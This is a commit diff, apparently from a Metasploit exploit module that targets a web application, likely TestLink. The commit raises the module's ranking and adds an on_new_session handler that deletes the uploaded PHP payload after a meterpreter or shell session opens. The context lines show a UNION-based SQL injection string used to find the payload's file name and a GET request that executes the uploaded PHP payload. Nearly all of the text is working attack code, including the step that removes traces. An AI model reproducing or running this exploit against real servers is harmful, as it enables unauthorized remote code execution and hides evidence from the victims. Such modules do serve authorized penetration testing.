ranking changed plus on_new_session handler added
parent
468030786f
commit
d6b28dc44d
|
@ -8,7 +8,7 @@
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GreatRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
@ -131,6 +131,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def on_new_session(client)
|
||||||
|
if client.type == "meterpreter"
|
||||||
|
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||||
|
client.fs.file.rm("#{@token}.php")
|
||||||
|
else
|
||||||
|
client.shell_command_token("rm #{@token}.php")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
base = target_uri.path
|
base = target_uri.path
|
||||||
|
@ -205,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'uri' => "#{base}upload_area/#{table}/#{id}/"
|
'uri' => "#{base}upload_area/#{table}/#{id}/"
|
||||||
})
|
})
|
||||||
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
||||||
token = $1
|
@token = $1
|
||||||
print_good("#{@peer} - Successfully retrieved file name (#{token})")
|
print_good("#{@peer} - Successfully retrieved file name (#{@token})")
|
||||||
else
|
else
|
||||||
print_error("#{@peer} - Could not retrieve file name from directory index.")
|
print_error("#{@peer} - Could not retrieve file name from directory index.")
|
||||||
end
|
end
|
||||||
|
@ -217,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
# attempt to retrieve real file name from the database
|
# attempt to retrieve real file name from the database
|
||||||
if token.nil?
|
if @token.nil?
|
||||||
print_status("#{@peer} - Retrieving real file name from the database.")
|
print_status("#{@peer} - Retrieving real file name from the database.")
|
||||||
sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
|
sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
|
||||||
begin
|
begin
|
||||||
|
@ -227,8 +237,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'cookie' => datastore['COOKIE'],
|
'cookie' => datastore['COOKIE'],
|
||||||
})
|
})
|
||||||
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
||||||
token = $1
|
@token = $1
|
||||||
print_good("#{@peer} - Successfully retrieved file name (#{token})")
|
print_good("#{@peer} - Successfully retrieved file name (#{@token})")
|
||||||
else
|
else
|
||||||
print_error("#{@peer} - Could not retrieve file name from the database.")
|
print_error("#{@peer} - Could not retrieve file name from the database.")
|
||||||
return
|
return
|
||||||
|
@ -240,11 +250,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
# retrieve and execute PHP payload
|
# retrieve and execute PHP payload
|
||||||
print_status("#{@peer} - Executing payload (#{token}.php)")
|
print_status("#{@peer} - Executing payload (#{@token}.php)")
|
||||||
begin
|
begin
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{token}.php"
|
'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{@token}.php"
|
||||||
})
|
})
|
||||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||||
print_error("#{@peer} - Connection failed")
|
print_error("#{@peer} - Connection failed")
|
||||||
|
|
Loading…
Reference in New Issue